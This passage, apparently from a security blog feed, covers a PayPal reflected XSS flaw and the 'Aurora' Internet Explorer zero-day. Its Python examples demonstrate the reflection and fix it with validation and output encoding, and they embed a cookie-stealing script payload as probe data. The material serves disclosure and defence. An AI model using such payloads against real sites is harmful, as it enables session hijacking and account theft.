Rather than displaying the cookies, the attacker would send the information to another web site, set the cookies locally as his own session, and begin to initiate transactions on behalf of the user. This is only one example: since Javascript can be executed in the context of the PayPal web site, the attacker could write a script to do just about any action on the site that is possible using Javascript, Flash, etc. Site redirects, iFrame injection, and even other injection flaws are possible on a web page that does not validate untrusted input.

XSS at a High Level
While the definition is ever expanding, XSS attacks are generally considered a type of injection problem where malicious input is injected into an otherwise trusted web page causing an unexpected behavior such as sending data to or from an unknown third party web site (cross site). Because the script is being run in the context of the trusted web site, it has access to cookies such as session tokens, as well as any other user information available within the security context of that web site. XSS vulnerabilities are somewhat common in web applications and will occur unfettered wherever untrusted input is not validated by the web application or encoded before output back to the user.
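Both PayPal write-ups in this feed, the sender_country reflection in the nvpsm page and the xclick/business one here, come down to the same defect: a request parameter copied into the response without output encoding. The following is an added example, not code from either post or from PayPal, that reproduces the reflection pattern in a few lines of Python and shows the two fixes the posts call for, an allow-list check on the input and HTML encoding on the output. The probe URL is constructed in the shape the posts show, and the function names and page text are this example’s own.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed probe URL in the shape the posts show; the alert(document.cookie)
# payload is percent-encoded the way a browser would send it.
PROBE_URL = ("https://www.paypal.com/nvpsm?amount=5.00&currency_code=USD"
             "&sender_country=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E")
GOOD_URL = "https://www.paypal.com/nvpsm?amount=5.00&currency_code=USD&sender_country=US"

# Allow-list for the field: an ISO 3166 alpha-2 code is exactly two capital letters.
ISO_ALPHA2 = re.compile(r"[A-Z]{2}")


def sender_country_param(url: str) -> str:
    """Return the percent-decoded sender_country value from a request URL ('' if absent)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("sender_country", [""])[0]


def render_error_unsafe(country: str) -> str:
    """The vulnerable pattern: the rejected value is copied into the markup as-is."""
    return f'<p>Error COWException: invalid country "{country}"</p>'


def render_error_safe(country: str) -> str:
    """Same page with the untrusted value HTML-encoded; quote=True also encodes quotes."""
    return f'<p>Error COWException: invalid country "{html.escape(country, quote=True)}"</p>'


def handle_request(url: str, encode_output: bool) -> str:
    """Toy handler for the page: validate first, then render with or without encoding."""
    country = sender_country_param(url)
    if ISO_ALPHA2.fullmatch(country):
        # Allow-listed input is safe by construction, but routing every reflected
        # value through one encoder is the shared-function fix the posts ask for.
        return f"<p>Sender country accepted: {html.escape(country)}</p>"
    render = render_error_safe if encode_output else render_error_unsafe
    return render(country)


def reflected_unencoded(response: str, payload: str) -> bool:
    """The check a scanner makes: does the raw payload come back in the response body?"""
    return payload in response
```

Encoding has to match the context the value lands in: html.escape covers element content and quoted attribute values, which is where both PayPal pages reflected the parameter, but a value dropped inside a script block or a URL needs JavaScript-string or URL encoding instead, and validating the field against an allow-list first means the error page rarely has anything hostile to encode at all.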

PayPal
The San Jose based company is owned by eBay and has more than 78 million customer accounts. As such the service is used to clear many of the transactions on the popular auction site. The service allows users to send money without needing to share financial information, a key enabler for sending and receiving money from third parties on the Internet. They are in some 190 markets around the world and can work with 19 different currencies.

In 2008 roughly $60 billion moved through PayPal’s systems.

PayPal does offer additional authentication protection in the form of a one-time password token it calls a ‘security key’ (similar to the ones made popular by RSA). The token costs five dollars and is available to residents of Australia, Germany, Canada, the United Kingdom and the United States. PayPal, however, allows this hard token to be bypassed by letting the user enter further information such as a credit card or bank account number, severely impacting its effectiveness as a security measure.

Further authentication “on the front door” of the web site (the login screen) does not prevent a user session from being hijacked after authentication, as is possible in a cross site scripting attack like this one.

PCI Compliance
Of note is that PayPal does claim PCI compliance, involving the following activities in their words:

  • Maintain a vulnerability management program
  • Pass quarterly remove vulnerability scans

The wording of that second bullet from the PayPal site is a little strange; we assume it means passing vulnerability scans that validate whether problems identified by previous scans were removed.

The attack string above is basic enough that it would, or should, be tested for and picked up as a vulnerability by the most rudimentary web scanners available, throwing the validity of any scanning being done into question. Actual credit card data is displayed in an obfuscated manner on the Profile section of the web site (only the last four digits show up), so perhaps the site is considered out of scope for a PCI-required scan?

The scanalert.com URL, a redirect to the McAfee service PayPal provides to its business customers at no cost for a year, presents a bad digital certificate.

Finally
Generally users can apply for refunds from PayPal when an account has been broken into, but as with any other service there are a share of horror stories. In general a site such as this should escape all output that originates from untrusted sources; given the variety of possible attack strings this is not foolproof, but it is a significant mitigation against injection attacks. This is not PayPal’s first brush with this problem: last year a similar issue was identified by Harry Sintonen. As PayPal is, for many users of eBay and other online services, the only payment game in town (the only one a seller will accept), this type of issue needs to be corrected fairly quickly and in a comprehensive manner (a site-wide change to introduce web vulnerability scanning, escape all user-provided input when it is output, and/or, ideally, validate all user-provided input).
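As an added illustration of the output-encoding fix this paragraph and the XSS section above call for (example code written for this edit, not PayPal’s code): the vulnerable rendering of the business value into the header tag, the same rendering with HTML entity encoding, a positive-validation check that assumes the value is a seller e-mail address, and the simple reflection check a scanner would apply.

```python
import html
import re

# Constructed sample: the payload quoted in the article, submitted as the
# "business" parameter of the /xclick/ page.
SAMPLE_BUSINESS = "<script> alert(document.cookie); </script>"

# Assumption: "business" identifies the seller by e-mail address, so a
# positive-validation pattern for it can be narrow.
BUSINESS_PATTERN = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# Characters that change meaning when emitted raw into an HTML document.
HTML_SPECIAL = set('<>"\'&')


def render_header_vulnerable(business: str) -> str:
    """Reflects the untrusted value straight into the <h1>, as the page above does."""
    return f'<div id="header"><h1>{business}</h1></div>'


def render_header_fixed(business: str) -> str:
    """Same markup, but the value is HTML-entity encoded before it is emitted."""
    return f'<div id="header"><h1>{html.escape(business, quote=True)}</h1></div>'


def is_valid_business(business: str) -> bool:
    """Input validation: reject anything that is not a plausible seller e-mail."""
    return BUSINESS_PATTERN.fullmatch(business) is not None


def reflected_unencoded(page: str, value: str) -> bool:
    """Scanner-style check: the submitted value appears verbatim in the response
    and carries HTML-significant characters, so it was emitted without encoding."""
    return bool(HTML_SPECIAL & set(value)) and value in page


if __name__ == "__main__":
    for render in (render_header_vulnerable, render_header_fixed):
        page = render(SAMPLE_BUSINESS)
        print(render.__name__, "->", page)
        print("  reflected unencoded:", reflected_unencoded(page, SAMPLE_BUSINESS))
    print("valid business value:", is_valid_business(SAMPLE_BUSINESS))
```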

References

  • Full Disclosure – Paypal XSS Vulnerability: http://seclists.org/fulldisclosure/2010/Mar/486
The “Aurora” IE Exploit Used Against Google in Action http://www.praetorianprefect.com/2010/01/the-aurora-ie-exploit-in-action/ Fri, 15 Jan 2010 07:24:40 +0000 http://www.praetorianprefect.com/?p=73 The big news hit earlier this week that the attack vector that allowed bad actors, presumably from China, into the networks of Google, Juniper, Adobe, and some 29 other firms was an Internet Explorer zero day: a use-after-free vulnerability on an invalid pointer reference affecting IE 6, 7, and 8, but only used by attackers against IE 6 according to Microsoft. Per Microsoft’s Advisory 979352: “In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.” Earlier today this entry from yesterday at Wepawet (an online analysis engine for malware) was pointed out to H.D. Moore, and within hours Metasploit had an exploit of the vulnerability integrated. McAfee has confirmed that the exploit is out and is the same one they saw during the investigation. The video below demonstrates how crackers initially gained access to the corporate networks of Google, et al. using this zero day attack.

Here It Is
The video below demonstrates how Google and the rest have been, according to most news reports, exploited via the “Aurora” vulnerability in Internet Explorer, and had their “intellectual property” taken.

The “Aurora” IE Exploit in Action from The Crew of Praetorian Prefect on Vimeo.

In the video you will see Metasploit set up a listening session, set up a web site that serves up the malicious code, and watch as an unsuspecting user visits the web site, triggers the attack that uses the IE vulnerability, and unknowingly opens a connection to a computer owned by the attacker. The attacker then lists the user’s processes, and elects to kill Notepad where the user was working on an important document. IE 6.0 is used, as this is the version Microsoft references as having been used in the “targeted attacks” on some 30+ U.S. companies.

A silly example for demonstration to be sure, but once the backdoor is open to the user’s PC the attacker can use it as a pivot point for other attacks against the internal network, escalate his or her privileges, take information off the PC, basically do anything the user can do.

The Vector
The attack scenario is that users were pointed to a web site (probably through a targeted spam e-mail, an attack called spear phishing) containing JavaScript that references this invalid pointer and injects the included shell code. The code below was released publicly yesterday.

aurora_vuln

Update

  • Ahmed Obied has published a clean python version of the exploit (opens your Windows Calculator) for testing, search: ie_aurora.py.
  • CVE-2010-0249 has been opened for this issue.

Finally

“At this time, we are aware of limited, active attacks attempting to use this vulnerability against Internet Explorer 6. We have not seen attacks against other affected versions of Internet Explorer.” – Microsoft.

This situation has the potential to change rapidly now that the exploit appears to be public. Microsoft last patched a vulnerability off cycle in July of 2009; they could elect to pursue the same response here.

Or as McAfee’s Craig Schmugar correctly opines: “What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users.”
